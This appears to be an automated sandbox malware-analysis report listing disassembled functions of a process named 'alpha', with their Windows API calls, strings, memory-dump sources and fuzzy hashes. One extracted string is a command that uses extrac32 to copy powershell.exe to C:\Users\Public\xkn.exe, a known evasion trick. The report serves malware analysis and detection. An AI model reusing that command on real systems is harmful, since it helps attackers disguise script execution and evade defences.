                                                                                                                    Function 00007FF789BC32B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
                                                                                                                      • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
                                                                                                                      • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BC32F3
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF789BC32A4), ref: 00007FF789BC3309
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF789BC3384
                                                                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BE11DF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 611521582-0
                                                                                                                    • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                    • Instruction ID: 011e5cb493d8f09fa99c0f6b33819a0f1d203141f79872e10c3efddf03b11205
                                                                                                                    • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                    • Instruction Fuzzy Hash: 2CA19022B0861686EB14AF61E8542BDFAB1FB89F9AFE44135CD0E47784EF3CD445C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC1560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                                    • String ID: \\?\
                                                                                                                    • API String ID: 628682198-4282027825
                                                                                                                    • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                                    • Instruction ID: db5213d4475f3a3cecd8c591053223bdf4b32c7ca516baa785ed74cafd053f77
                                                                                                                    • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                                    • Instruction Fuzzy Hash: FBE1B222B0868A96EF64AF20D8442F9ABB0FB45F5AFA05135DA0E477D4EF3CE545C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEAFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 16309207-0
                                                                                                                    • Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                                                                                                    • Instruction ID: 6720803b7b0e68671e10d1e1bd9313ed28fd71cf9afd3815a3c1a22e8f68ad7f
                                                                                                                    • Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                                                                                                    • Instruction Fuzzy Hash: 2822C222704B8A86EB24AF21D8542FDABB4FF85B86FA04135DA0E47B95DF3CE145C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCCE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                                    • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                                                                                                                    • API String ID: 3863671652-3077789980
                                                                                                                    • Opcode ID: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                                                                                                    • Instruction ID: d710025a6ff9975953b7bfcff9fd1356fb7ae6e7ee5b7dcbc4b2ce0f601362f0
                                                                                                                    • Opcode Fuzzy Hash: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                                                                                                    • Instruction Fuzzy Hash: 69E1AE25A0928A82FA60BF25D858379EAB0BF85FA6FF54435D90D027D1DF3CE845C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC3410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                    • String ID: $Application$System
                                                                                                                    • API String ID: 3538039442-1881496484
                                                                                                                    • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                    • Instruction ID: b09bdabf5000ee21caf924bf3d8a787722f9fda8758c6977b349684a1de16b3c
                                                                                                                    • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                    • Instruction Fuzzy Hash: 5951AB32A08B4596EA20AF15B41067AFBB5FB89F96FA49138DE4E03754EF3CD445C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BED9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • longjmp.MSVCRT(?,?,00000000,00007FF789BE048E), ref: 00007FF789BEDA58
                                                                                                                    • memset.MSVCRT ref: 00007FF789BEDAD6
                                                                                                                    • memset.MSVCRT ref: 00007FF789BEDAFC
                                                                                                                    • memset.MSVCRT ref: 00007FF789BEDB22
                                                                                                                      • Part of subcall function 00007FF789BD3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BEEAC5,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BD3A56
                                                                                                                      • Part of subcall function 00007FF789BC5194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF789BC51C4
                                                                                                                      • Part of subcall function 00007FF789BD823C: FindFirstFileExW.KERNELBASE ref: 00007FF789BD8280
                                                                                                                      • Part of subcall function 00007FF789BD823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BD829D
                                                                                                                      • Part of subcall function 00007FF789BD01B8: _get_osfhandle.MSVCRT ref: 00007FF789BD01C4
                                                                                                                      • Part of subcall function 00007FF789BD01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD01D6
                                                                                                                      • Part of subcall function 00007FF789BC4FE8: _get_osfhandle.MSVCRT ref: 00007FF789BC5012
                                                                                                                      • Part of subcall function 00007FF789BC4FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BC5030
                                                                                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BEDDB0
                                                                                                                      • Part of subcall function 00007FF789BC59E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BC5A2E
                                                                                                                      • Part of subcall function 00007FF789BC59E4: _open_osfhandle.MSVCRT ref: 00007FF789BC5A4F
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BEDDEB
                                                                                                                    • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BEDDFA
                                                                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF789BEE204
                                                                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF789BEE223
                                                                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF789BEE242
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                                                    • String ID: %9d$%s$~
                                                                                                                    • API String ID: 3651208239-912394897
                                                                                                                    • Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                                                                                                    • Instruction ID: 1b6fd5ec4e57d7f26f5b95cbd416afdf9820befb785c6e867baf2d23cd15c9e3
                                                                                                                    • Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                                                                                                    • Instruction Fuzzy Hash: ED429331A086CA86EB64BF21D8541FDBBB4FB85B4AFA00135E64D47A99DF3DE540C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                    • String ID: COPYCMD$\
                                                                                                                    • API String ID: 3989487059-1802776761
                                                                                                                    • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                    • Instruction ID: 6b6dd3ec5bf9776edeffa21c65dc91d4f24febc0c677b7cbe7f83786abaa64d4
                                                                                                                    • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                    • Instruction Fuzzy Hash: B7F1C165B0878E82EA64BF15D4042BEABB4FF45F9AFA48035DA4E47794EE3CE045C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD3140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                    • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                                    • API String ID: 55602301-2548490036
                                                                                                                    • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                    • Instruction ID: d3f7be1a393bc9cf72f9f1d153652a94ed7f9ba5d3e75fa309e7cc863788626a
                                                                                                                    • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                    • Instruction Fuzzy Hash: 18A19432A1874A96EB50AF10E4482BAFFB5FB84B56FE00135DA4E07694EF7CE545C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BF1538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3935429995-0
                                                                                                                    • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                    • Instruction ID: f2ca8261b174ac662338fa1610e0c30e40dc7d2390ffe08121f26de93f681725
                                                                                                                    • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                    • Instruction Fuzzy Hash: C661AB26B08A9686E714AF22A404679FFB4FB89F96FA58534DE4E43790EF3CD401C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC35B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                                    • Instruction ID: 41f95c2a4be24c092dec472be3dc1621d56eb026449010c274ca4eff4fc62ccd
                                                                                                                    • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                                    • Instruction Fuzzy Hash: B991D53270868A86EB64AF24D4102FDBAB0FB49F5AFA04135DA4E47794EF3CD544C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCB0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_osfhandlememset$wcschr
                                                                                                                    • String ID: DPATH
                                                                                                                    • API String ID: 3260997497-2010427443
                                                                                                                    • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                                    • Instruction ID: 06798f63061c69187b4a835607453dbed025d49a2c74f37c3082bb0d61473308
                                                                                                                    • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                                    • Instruction Fuzzy Hash: 31D1B122A0869A82EB10BF61D80417DABB1FF84FAAFA44235D91D477D4DF3CE901C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD7FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
